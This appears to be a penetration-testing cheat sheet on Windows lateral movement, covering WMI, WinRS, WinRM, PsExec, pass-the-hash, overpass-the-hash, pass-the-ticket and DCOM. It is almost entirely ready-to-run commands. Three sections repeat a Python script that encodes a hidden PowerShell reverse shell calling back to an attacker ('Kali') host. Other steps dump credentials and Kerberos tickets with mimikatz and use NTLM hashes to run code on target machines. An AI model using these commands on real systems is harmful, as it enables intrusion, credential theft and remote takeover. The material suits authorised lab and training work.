# Lateral Movement

## WMI and WinRM

### WMI (Windows Management Instrumentation)

{% stepper %}
{% step %}

### Test if can create process

{% code overflow="wrap" %}

```shell
wmic /node:<Target IP Address> /user:<Username> /password:<Password> process call create "calc"
```

{% endcode %}
{% endstep %}

{% step %}

### Create the following python script

{% code overflow="wrap" %}

```python
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)
```

{% endcode %}
{% endstep %}

{% step %}

### Run the script

```bash
python3 encode.py
```

{% endstep %}

{% step %}

### Paste the following in PowerShell

{% code overflow="wrap" %}

```powershell
$username = '<Username>';
$password = '<Password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName <Target IP Address> -Credential $credential -SessionOption $Options

$Command = '<Paste the output from previous step>';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $Command};
```

{% endcode %}
{% endstep %}
{% endstepper %}

### WinRS

> **NOTE: In order for WinRS to work, the user has to be part of the Administrators or Remote Management Users group on the Target Machine**

{% stepper %}
{% step %}

### Test if command is able to run

{% code overflow="wrap" %}

```powershell
winrs -r:<Target Hostname> -u:<Username> -p:<Password>  "cmd /c hostname & whoami"
```

{% endcode %}
{% endstep %}

{% step %}

### Create the following python script

{% code overflow="wrap" %}

```python
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)
```

{% endcode %}
{% endstep %}

{% step %}

### Run the script

```bash
python3 encode.py
```

{% endstep %}

{% step %}

### Send payload

{% code overflow="wrap" %}

```powershell
winrs -r:<Target Hostname> -u:<Username> -p:<Password> "<Paste the output from previous step>"
```

{% endcode %}
{% endstep %}
{% endstepper %}

### WinRM

{% stepper %}
{% step %}

### Paste the following in PowerShell

{% code overflow="wrap" %}

```powershell
$username = '<Username>';
$password = '<Password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <Target IP Address> -Credential $credential
```

{% endcode %}
{% endstep %}

{% step %}

### Interact with the Session ID

```powershell
Enter-PSSession <Id>
```

{% endstep %}
{% endstepper %}

## PsExec

> **NOTE: For PsExec to be executed successfully three conditions must be met**
>
> 1. The user that authenticates to target machine must be in Administrators local group
> 2. ADMIN$ share must be available (Default available)
> 3. File and Printer Sharing has to be turned on (Default on)

{% code overflow="wrap" %}

```powershell
C:\Tools\SysinternalsSuite\PsExec.exe -i \\<Target Hostname> -u <Domain Name>\<Username> -p <Password> cmd
```

{% endcode %}

## Pass the hash

> **NOTE: For Pass the Hash to be executed successfully three conditions must be met**
>
> 1. SMB connection through the Firewall (Port 445)
> 2. Windows File and Printer Sharing feature to be enabled (Default enabled)
> 3. ADMIN$ share to be available (Default available) and Local Administrative Permission

{% code overflow="wrap" %}

```bash
impacket-wmiexec -hashes :<NTLM Hash> <Username>@<Target IP Address>
```

{% endcode %}

```bash
impacket-psexec -hashes :<NTLM Hash> <Username>@<Target IP Address>
```

## Overpass the Hash

> **NOTE: For Overpass the Hash to work, must have the NTLM hash of the user**
>
> **NOTE: Use this when want to access other service as another user**

{% stepper %}
{% step %}

### Run mimikatz.exe

```powershell
C:\Tools\mimikatz.exe
```

{% endstep %}

{% step %}

### Enable SeDebugPrivilege

```powershell
privilege::debug
```

{% endstep %}

{% step %}

### Dump NTLM hash

```powershell
sekurlsa::logonpasswords
```

{% endstep %}

{% step %}

### Craft a Kerberos ticket

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:<Username> /domain:<Domain Name> /ntlm:<NTLM Hash> /run:powershell
```

{% endcode %}
{% endstep %}

{% step %}

### Authenticate a service

```powershell
net use \\<Target Hostname>
```

{% endstep %}

{% step %}

### Verify if ticket is acquired

```powershell
klist
```

{% endstep %}

{% step %}

### Run PsExec.exe

```powershell
C:\Tools\SysinternalsSuite\PsExec.exe \\<Target Hostname> cmd
```

{% endstep %}
{% endstepper %}

## Pass the ticket

> **NOTE: Use this when want to access other service as another user**

{% stepper %}
{% step %}

### Run mimikatz.exe

```powershell
C:\Tools\mimikatz.exe
```

{% endstep %}

{% step %}

### Enable SeDebugPrivilege

```powershell
privilege::debug
```

{% endstep %}

{% step %}

### Exports the tickets

```powershell
sekurlsa::tickets /export
```

{% endstep %}

{% step %}

### Find the kirbi files in PowerShell

```powershell
dir *.kirbi
```

{% endstep %}

{% step %}

### Use the ticket

```powershell
kerberos::ptt <Directory Name>
```

{% endstep %}

{% step %}

### Verify if ticket is acquired

```powershell
klist
```

{% endstep %}
{% endstepper %}

## DCOM

{% stepper %}
{% step %}

### Paste the following in PowerShell

{% code overflow="wrap" %}

```powershell
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<Target IP Address>"))
```

{% endcode %}
{% endstep %}

{% step %}

### Create the following python script

{% code overflow="wrap" %}

```python
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)
```

{% endcode %}
{% endstep %}

{% step %}

### Run the script

```bash
python3 encode.py
```

{% endstep %}

{% step %}

### Paste the payload in PowerShell

{% code overflow="wrap" %}

```powershell
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"<Paste the output from previous step>","7")
```

{% endcode %}
{% endstep %}
{% endstepper %}